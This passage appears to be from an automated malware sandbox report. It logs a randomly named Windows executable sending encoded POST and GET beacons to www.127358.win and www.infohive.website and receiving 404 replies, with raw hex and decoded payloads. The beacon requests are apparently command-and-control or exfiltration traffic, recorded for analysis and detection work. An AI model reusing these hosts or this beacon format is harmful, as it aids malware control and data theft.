Dec 13, 2024 13:07:48.942747116 CET | 1236 | IN | Data Raw: 44 64 70 54 4c 74 64 45 50 41 31 67 4a 4b 46 4e 46 66 6c 4d 58 54 35 43 59 56 56 42 4d 41 58 4f 43 68 6b 57 63 7a 54 6c 78 2f 5a 73 65 2b 62 6a 71 39 61 44 35 2f 59 33 79 4c 62 59 6f 6c 6b 41 49 68 77 36 59 33 6d 32 75 2f 67 7a 77 30 46 45 4a 6a
                                                    Data Ascii: DdpTLtdEPA1gJKFNFflMXT5CYVVBMAXOChkWczTlx/Zse+bjq9aD5/Y3yLbYolkAIhw6Y3m2u/gzw0FEJjvGgKox2Pr9hOIx2G5EQJeL3jMIoldD934ptP9nKyRAT5c2IEY0+SVW00j4Uf7QDZHUVo3dvUJh4qcxjGwBtcz06NX9h7x+YauPaf/kXy/pVpFg4fMz6wFHuGFXPIijWnr58bOPtF4HJab2HRuXn0AIYWdu5+TYbgx
Dec 13, 2024 13:07:48.942761898 CET | 1236 | IN | Data Raw: 45 4f 4e 56 33 54 36 4e 4c 35 50 39 42 59 46 39 2f 7a 58 38 64 7a 79 6a 6b 32 49 61 42 4b 41 4e 73 69 33 38 36 72 56 30 42 45 4d 39 57 6f 4f 77 68 6f 61 32 32 34 46 67 4f 6b 73 4b 6a 62 44 54 6e 4e 48 41 64 68 4d 59 47 59 4d 2f 6a 58 39 76 46 56
                                                    Data Ascii: EONV3T6NL5P9BYF9/zX8dzyjk2IaBKANsi386rV0BEM9WoOwhoa224FgOksKjbDTnNHAdhMYGYM/jX9vFVbwOylS1VW0H0PDuCZErqeirZOEiF57flzAkBKFmSP2jq57Mj4MgDWQRb4C86yWNol7z0SIzGWmM9MC1maZlPjFZ0mNS5DCm7776Hxik4DiCgGQBc8HCZieboMtxYaag15ij4WwBYa285mQCcDTsJOeAMDK1nJ31sF
Dec 13, 2024 13:07:48.942898989 CET | 1236 | IN | Data Raw: 79 73 42 51 59 77 78 2f 37 4e 4a 31 2f 33 42 6d 42 38 67 6a 32 52 76 5a 4b 52 66 5a 6f 73 6e 50 6b 73 6a 5a 6e 34 43 6a 66 43 2f 49 70 6f 53 51 50 69 53 78 72 5a 72 78 71 4a 69 38 34 63 6f 32 43 30 39 6e 32 61 79 42 6f 50 6e 4c 74 67 78 34 77 48
                                                    Data Ascii: ysBQYwx/7NJ1/3BmB8gj2RvZKRfZosnPksjZn4CjfC/IpoSQPiSxrZrxqJi84co2C09n2ayBoPnLtgx4wHySFu7EM8algthDCrYeAjIUdKqVHjpSihoruB0bRyAdjbsTXVLBwynwU1aQCX0KXDOG4RyINQBh5bg0A1gZRX04R+JxJiXRRJ7WCSpjShJz0iMVWSM+THIzirPptrK44eXsC92zoMkrbXRXE0Ac2jsXy8tA7PrsLKt
Dec 13, 2024 13:07:48.942923069 CET | 1236 | IN | Data Raw: 4e 47 58 7a 64 68 70 64 78 72 31 62 79 49 37 4f 33 75 6b 6c 35 63 58 42 32 43 6f 48 56 50 2b 54 6e 72 4f 63 72 5a 2b 59 33 58 36 71 50 65 48 38 4e 65 74 4c 4e 53 4b 71 43 78 75 70 5a 51 71 34 36 50 62 6e 5a 5a 72 43 53 2f 71 67 61 45 56 2b 46 31
                                                    Data Ascii: NGXzdhpdxr1byI7O3ukl5cXB2CoHVP+TnrOcrZ+Y3X6qPeH8NetLNSKqCxupZQq46PbnZZrCS/qgaEV+F1vrvo5CH7etopNmKFgAf+/isGo9wfQBEBjyAn4tX01qutq4LO2cze+Al/tWRCLc6RNhxzW5vNfq37sOpz/IHpR+oYrJz4OVKnHvl2rae2k3OwlImNheWa3DUb9IQAxAHYCuDip7awn502joqcIDPAWiBridsIWBPh+
Dec 13, 2024 13:07:48.942939043 CET | 1236 | IN | Data Raw: 7a 6c 62 64 66 77 49 54 4e 62 4a 6a 78 68 77 56 47 58 39 7a 75 4f 6c 74 43 71 2b 30 42 31 46 6a 63 44 48 66 44 6e 68 52 79 38 51 4e 62 48 54 4a 62 73 35 69 66 38 6d 44 45 5a 39 4f 59 4e 52 50 39 42 67 31 44 39 77 55 70 4d 68 54 2f 2f 2b 72 4d 48
                                                    Data Ascii: zlbdfwITNbJjxhwVGX9zuOltCq+0B1FjcDHfDnhRy8QNbHTJbs5if8mDEZ9OYNRP9Bg1D9wUpMhT//+rMHJkFdoRa1aXkrwDflg0da0syUCDkKrHgJCDHKkgQDWALjGFsXtcLQPTqUNEGi2VRL7rz+zYkOT4BqvH7v/R1U1J7xYQuu9ctedy+t+NR0fM6PZq79cSEv8UmKsUSELl1rIC3GNAYw3GPW/5/0nYv7t610MuG4vtPng
Dec 13, 2024 13:07:48.942954063 CET | 776 | IN | Data Raw: 51 70 45 54 39 74 6f 66 69 2f 6b 33 4d 4d 6e 6d 76 34 68 6e 32 34 42 38 4c 30 39 4f 38 59 51 76 4f 4c 6f 67 65 2f 5a 67 76 30 2f 77 57 4a 64 2f 4f 63 4a 67 58 75 61 32 70 51 4c 31 67 72 63 51 7a 6d 4c 56 51 4b 39 74 6d 42 41 6f 7a 62 67 79 4e 34
                                                    Data Ascii: QpET9tofi/k3MMnmv4hn24B8L09O8YQvOLoge/Zgv0/wWJd/OcJgXua2pQL1grcQzmLVQK9tmBAozbgyN4sIAF2Pgf/JAxGfXWDUT8VQDyIZkCuXG0XH412yrg2jUNeWrCpIgQ6AY2q70MGAnrgkiUbalqXd+QkJGxwtp/FyiVkYAvk38CllDs/n+z9P+5uWkJ3lu9LSICPl6CeM/di/JaI/eu2Bmq9mwvE2d1+zsMfwGDIu4vL
Dec 13, 2024 13:07:48.942970037 CET | 1236 | IN | Data Raw: 79 39 77 49 48 4d 2b 76 4c 6a 31 6b 4f 4f 78 41 4f 41 71 47 50 75 78 4f 50 30 75 6c 73 50 71 55 65 38 6a 45 34 42 6c 44 2f 35 6d 59 4e 56 2b 2b 6d 50 2f 68 6d 75 44 44 79 77 7a 69 39 62 50 43 74 6f 54 34 4f 32 76 31 73 32 39 6d 70 6d 79 59 66 36
                                                    Data Ascii: y9wIHM+vLj1kOOxAOAqGPuxOP0ulsPqUe8jE4BlD/5mYNV++mP/hmuDDywzi9bPCtoT4O2v1s29mpmyYf6JuCO9y4fU5on7zQH9DV/I29Z7DUb9BINRb3MR8G/kBGzLzIAB5dVmVg33kn/Jd9iM5Izr11Mz86/dWRpWLPExhTd/GQLfzUaTJshVZDw8zFwUIjddCMKeKwmr2LLZx5GVK69/qfjnPtt0KIUDLgBASS/1byinrQgi
Dec 13, 2024 13:07:48.943135023 CET | 1236 | IN | Data Raw: 78 49 55 72 69 58 61 77 79 55 4f 71 31 65 39 38 4c 4f 51 67 38 73 65 49 74 32 55 76 64 68 34 2b 66 75 6d 35 2b 39 66 36 77 77 37 74 64 6e 55 6e 44 41 2b 70 45 47 48 66 56 38 63 32 35 37 38 74 48 2f 4a 46 69 71 65 6e 2b 64 67 4e 33 53 51 30 33 35
                                                    Data Ascii: xIUriXawyUOq1e98LOQg8seIt2Uvdh4+fum5+9f6ww7tdnUnDA+pEGHfV8c2578tH/JFiqen+dgN3SQ035iDUa9rbWex8UeFAxZKAAD1FeSj3ZCVs4OyOLKdzKtPwZbRamywNGJ12pPWII6FeeBiq51mMfX7GuPv7LDCtgJ6P0LVmLP1btrjjd5+jukZMb9kZJ+tYyf17wriekh4Dgl5ef/9qm5wahvDmAz5HVNxWu9DIBG4FdV


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
5 | 192.168.2.7 | 49902 | 206.238.89.119 | 80 | 6896 | C:\Program Files (x86)\QQCLGVgRClRwYvNyIwVjJCpmPkEDvXQBFFCodxdWuHlaIKzcNFTvxkEs\LcmEonpIrfS.exe
Timestamp | Bytes transferred | Direction | Data
Dec 13, 2024 13:07:56.117201090 CET | 859 | OUT | POST /2mep/ HTTP/1.1
                                                    Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                    Accept-Encoding: gzip, deflate, br
                                                    Accept-Language: en-US,en;q=0.5
                                                    Host: www.127358.win
                                                    Content-Type: application/x-www-form-urlencoded
                                                    Connection: close
                                                    Content-Length: 219
                                                    Cache-Control: no-cache
                                                    Origin: http://www.127358.win
                                                    Referer: http://www.127358.win/2mep/
                                                    User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E; Local IDS7)
                                                    Data Raw: 55 5a 6b 74 5f 70 3d 64 75 54 39 51 54 4f 2b 39 35 78 65 38 44 6a 6e 6f 62 4d 75 69 6f 6c 36 49 4c 70 7a 32 4f 4d 66 30 49 4d 53 78 2b 65 6a 6a 74 4c 4e 72 56 35 2b 57 62 6f 51 36 39 41 72 4b 6d 70 63 44 4e 48 36 6e 2f 7a 4c 45 36 66 77 62 4a 70 71 61 75 30 6f 4c 69 54 51 37 50 46 73 7a 34 46 6e 45 4c 2b 43 75 31 2b 44 52 76 74 45 51 54 51 43 38 65 6b 39 55 41 53 73 4b 4d 66 6c 76 66 52 4e 75 4f 31 71 65 4a 66 39 75 61 6f 32 51 75 47 70 30 44 2b 59 71 58 75 72 49 4c 41 45 2b 4b 2b 2b 78 35 74 43 6a 39 41 31 54 62 65 46 4b 69 44 32 34 6d 57 53 46 65 6f 6e 6b 6d 6d 5a 37 39 76 7a 78 6f 58 71 75 4f 30 71 6e 51 34 58 37 35 57 69 67 71 4e 55 2f 51 3d 3d
                                                    Data Ascii: UZkt_p=duT9QTO+95xe8DjnobMuiol6ILpz2OMf0IMSx+ejjtLNrV5+WboQ69ArKmpcDNH6n/zLE6fwbJpqau0oLiTQ7PFsz4FnEL+Cu1+DRvtEQTQC8ek9UASsKMflvfRNuO1qeJf9uao2QuGp0D+YqXurILAE+K++x5tCj9A1TbeFKiD24mWSFeonkmmZ79vzxoXquO0qnQ4X75WigqNU/Q==
Dec 13, 2024 13:07:57.651676893 CET | 691 | IN | HTTP/1.1 404 Not Found
                                                    Server: nginx
                                                    Date: Fri, 13 Dec 2024 12:07:57 GMT
                                                    Content-Type: text/html
                                                    Content-Length: 548
                                                    Connection: close
                                                    Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 [TRUNCATED]
                                                    Data Ascii: <html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx</center></body></html>... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
6 | 192.168.2.7 | 49911 | 206.238.89.119 | 80 | 6896 | C:\Program Files (x86)\QQCLGVgRClRwYvNyIwVjJCpmPkEDvXQBFFCodxdWuHlaIKzcNFTvxkEs\LcmEonpIrfS.exe
Timestamp | Bytes transferred | Direction | Data
Dec 13, 2024 13:07:58.773279905 CET | 879 | OUT | POST /2mep/ HTTP/1.1
                                                    Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                    Accept-Encoding: gzip, deflate, br
                                                    Accept-Language: en-US,en;q=0.5
                                                    Host: www.127358.win
                                                    Content-Type: application/x-www-form-urlencoded
                                                    Connection: close
                                                    Content-Length: 239
                                                    Cache-Control: no-cache
                                                    Origin: http://www.127358.win
                                                    Referer: http://www.127358.win/2mep/
                                                    User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E; Local IDS7)
                                                    Data Raw: 55 5a 6b 74 5f 70 3d 64 75 54 39 51 54 4f 2b 39 35 78 65 38 69 54 6e 37 4d 51 75 6b 49 6c 39 57 62 70 7a 34 65 4d 62 30 49 41 53 78 38 7a 6f 69 66 76 4e 73 30 4a 2b 48 76 63 51 33 64 41 72 53 32 70 64 64 39 48 48 6e 2f 2f 31 45 37 6a 77 62 4e 4a 71 61 75 45 6f 4c 52 4c 66 34 2f 46 35 37 59 46 70 62 37 2b 43 75 31 2b 44 52 76 35 2b 51 58 38 43 38 75 55 39 57 68 53 6a 41 73 66 6d 73 66 52 4e 34 4f 31 75 65 4a 66 62 75 62 45 63 51 6f 4b 70 30 42 32 59 71 47 75 6f 43 4c 41 43 6a 36 2f 39 67 34 77 6e 76 76 59 4f 58 4a 71 6c 49 52 4c 49 35 51 58 77 66 38 6b 4c 36 33 65 69 2f 2f 4c 46 6d 4f 4b 66 73 50 77 79 71 79 4d 32 6b 4f 7a 49 74 34 73 51 70 6f 44 34 79 55 4e 42 76 35 6d 62 39 76 57 56 68 70 77 54 4f 2f 59 3d
                                                    Data Ascii: UZkt_p=duT9QTO+95xe8iTn7MQukIl9Wbpz4eMb0IASx8zoifvNs0J+HvcQ3dArS2pdd9HHn//1E7jwbNJqauEoLRLf4/F57YFpb7+Cu1+DRv5+QX8C8uU9WhSjAsfmsfRN4O1ueJfbubEcQoKp0B2YqGuoCLACj6/9g4wnvvYOXJqlIRLI5QXwf8kL63ei//LFmOKfsPwyqyM2kOzIt4sQpoD4yUNBv5mb9vWVhpwTO/Y=
                                                    Timestamp: Dec 13, 2024 13:08:00.326000929 CET | Bytes transferred: 691 | Direction: IN | Data: HTTP/1.1 404 Not Found
                                                    Server: nginx
                                                    Date: Fri, 13 Dec 2024 12:08:00 GMT
                                                    Content-Type: text/html
                                                    Content-Length: 548
                                                    Connection: close
                                                    Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 [TRUNCATED]
                                                    Data Ascii: <html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx</center></body></html><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page -->


                                                    Session ID: 7 | Source IP: 192.168.2.7 | Source Port: 49918 | Destination IP: 206.238.89.119 | Destination Port: 80 | PID: 6896 | Process: C:\Program Files (x86)\QQCLGVgRClRwYvNyIwVjJCpmPkEDvXQBFFCodxdWuHlaIKzcNFTvxkEs\LcmEonpIrfS.exe
                                                    Timestamp: Dec 13, 2024 13:08:01.432712078 CET | Bytes transferred: 1892 | Direction: OUT | Data: POST /2mep/ HTTP/1.1
                                                    Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                    Accept-Encoding: gzip, deflate, br
                                                    Accept-Language: en-US,en;q=0.5
                                                    Host: www.127358.win
                                                    Content-Type: application/x-www-form-urlencoded
                                                    Connection: close
                                                    Content-Length: 1251
                                                    Cache-Control: no-cache
                                                    Origin: http://www.127358.win
                                                    Referer: http://www.127358.win/2mep/
                                                    User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E; Local IDS7)
                                                    Data Raw: 55 5a 6b 74 5f 70 3d 64 75 54 39 51 54 4f 2b 39 35 78 65 38 69 54 6e 37 4d 51 75 6b 49 6c 39 57 62 70 7a 34 65 4d 62 30 49 41 53 78 38 7a 6f 69 66 6e 4e 73 47 42 2b 56 34 41 51 32 64 41 72 62 57 70 51 64 39 48 57 6e 2f 6e 78 45 37 75 46 62 4c 46 71 62 4e 4d 6f 44 41 4c 66 6a 50 46 35 33 34 46 6f 45 4c 2b 58 75 31 76 72 52 76 70 2b 51 58 38 43 38 73 4d 39 53 77 53 6a 47 73 66 6c 76 66 51 43 75 4f 31 47 65 4a 47 67 75 62 77 6d 54 59 71 70 78 52 6d 59 6c 55 32 6f 41 72 41 41 69 36 2f 66 67 34 38 30 76 76 45 6f 58 4e 71 62 49 53 72 49 31 6b 53 66 48 73 6b 41 76 78 4b 52 38 38 6e 61 6c 75 43 41 31 4f 31 50 73 6c 59 69 71 4f 50 65 6c 61 45 35 72 63 61 61 6e 6d 70 31 6b 62 7a 4c 7a 62 44 6e 36 4a 77 78 64 6f 56 45 4f 59 35 55 44 2b 32 51 6f 33 72 68 31 45 31 61 77 77 6f 6d 49 59 65 52 66 44 4b 56 67 35 4b 6b 66 6d 57 47 73 79 74 54 68 45 44 6c 71 51 57 67 41 4b 32 5a 67 76 69 66 35 70 46 69 6a 6f 2f 34 4c 49 74 58 6f 73 46 67 51 74 4b 37 2b 46 6b 44 39 66 2b 34 5a 78 39 58 72 70 68 36 68 56 4b 35 4f 4d 63 [TRUNCATED]
                                                    Data Ascii: UZkt_p= [TRUNCATED]
                                                    Timestamp: Dec 13, 2024 13:08:02.988624096 CET | Bytes transferred: 691 | Direction: IN | Data: HTTP/1.1 404 Not Found
                                                    Server: nginx
                                                    Date: Fri, 13 Dec 2024 12:08:02 GMT
                                                    Content-Type: text/html
                                                    Content-Length: 548
                                                    Connection: close
                                                    Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 [TRUNCATED]
                                                    Data Ascii: <html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx</center></body></html><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page -->


                                                    Session ID: 8 | Source IP: 192.168.2.7 | Source Port: 49924 | Destination IP: 206.238.89.119 | Destination Port: 80 | PID: 6896 | Process: C:\Program Files (x86)\QQCLGVgRClRwYvNyIwVjJCpmPkEDvXQBFFCodxdWuHlaIKzcNFTvxkEs\LcmEonpIrfS.exe
                                                    Timestamp: Dec 13, 2024 13:08:04.086200953 CET | Bytes transferred: 597 | Direction: OUT | Data: GET /2mep/?Er=qt9d5V&UZkt_p=Qs7dTkG74ZlbzDPIks80sLprU65g+bEtyeoxhvOotfrZ9WhcV54Y9rQsYH5lTs77muDKHbL5HIFuHfk3BCfdk4oV88xQLJu313/wS+c/dWkGwsg/R2WIJaTqq/By1MtUaaLvo6grX4O5 HTTP/1.1
                                                    Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                    Accept-Language: en-US,en;q=0.5
                                                    Host: www.127358.win
                                                    Connection: close
                                                    User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E; Local IDS7)
                                                    Timestamp: Dec 13, 2024 13:08:05.631333113 CET | Bytes transferred: 691 | Direction: IN | Data: HTTP/1.1 404 Not Found
                                                    Server: nginx
                                                    Date: Fri, 13 Dec 2024 12:08:05 GMT
                                                    Content-Type: text/html
                                                    Content-Length: 548
                                                    Connection: close
                                                    Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 [TRUNCATED]
                                                    Data Ascii: <html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx</center></body></html><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page -->


                                                    Session ID: 9 | Source IP: 192.168.2.7 | Source Port: 49941 | Destination IP: 66.29.149.46 | Destination Port: 80 | PID: 6896 | Process: C:\Program Files (x86)\QQCLGVgRClRwYvNyIwVjJCpmPkEDvXQBFFCodxdWuHlaIKzcNFTvxkEs\LcmEonpIrfS.exe
                                                    Timestamp: Dec 13, 2024 13:08:11.486176968 CET | Bytes transferred: 877 | Direction: OUT | Data: POST /cnve/ HTTP/1.1
                                                    Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                    Accept-Encoding: gzip, deflate, br
                                                    Accept-Language: en-US,en;q=0.5
                                                    Host: www.infohive.website
                                                    Content-Type: application/x-www-form-urlencoded
                                                    Connection: close
                                                    Content-Length: 219
                                                    Cache-Control: no-cache
                                                    Origin: http://www.infohive.website
                                                    Referer: http://www.infohive.website/cnve/
                                                    User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E; Local IDS7)
                                                    Data Raw: 55 5a 6b 74 5f 70 3d 37 58 72 79 54 6f 73 31 30 52 71 57 6b 44 64 5a 65 30 37 36 5a 34 74 2b 51 70 44 6b 59 63 36 44 6a 72 36 32 49 56 4d 38 76 69 48 37 67 5a 51 52 52 57 52 53 54 66 65 4e 4d 52 68 55 61 58 48 6b 61 63 41 64 6f 6e 47 74 4a 76 56 61 36 73 4a 57 63 38 42 51 46 58 77 74 56 31 61 57 31 74 50 57 64 61 6f 39 4a 52 42 76 74 74 46 56 50 53 35 56 72 6e 65 76 6d 39 46 73 55 75 58 2b 78 62 33 76 69 6b 62 62 54 64 69 7a 31 6f 6b 71 4e 6e 76 68 58 76 4f 71 4e 51 55 52 4f 61 65 65 47 42 7a 33 4d 5a 71 75 31 76 52 4b 74 31 61 34 72 65 55 6d 6f 71 73 68 65 74 52 6f 4e 78 65 73 50 39 55 46 6b 77 34 6e 72 62 4d 6f 6e 78 6f 62 73 64 44 63 73 41 3d 3d
                                                    Data Ascii: UZkt_p=7XryTos10RqWkDdZe076Z4t+QpDkYc6Djr62IVM8viH7gZQRRWRSTfeNMRhUaXHkacAdonGtJvVa6sJWc8BQFXwtV1aW1tPWdao9JRBvttFVPS5Vrnevm9FsUuX+xb3vikbbTdiz1okqNnvhXvOqNQUROaeeGBz3MZqu1vRKt1a4reUmoqshetRoNxesP9UFkw4nrbMonxobsdDcsA==
                                                    Timestamp: Dec 13, 2024 13:08:12.719862938 CET | Bytes transferred: 637 | Direction: IN | Data: HTTP/1.1 404 Not Found
                                                    Date: Fri, 13 Dec 2024 12:08:12 GMT
                                                    Server: Apache
                                                    Content-Length: 493
                                                    Connection: close
                                                    Content-Type: text/html
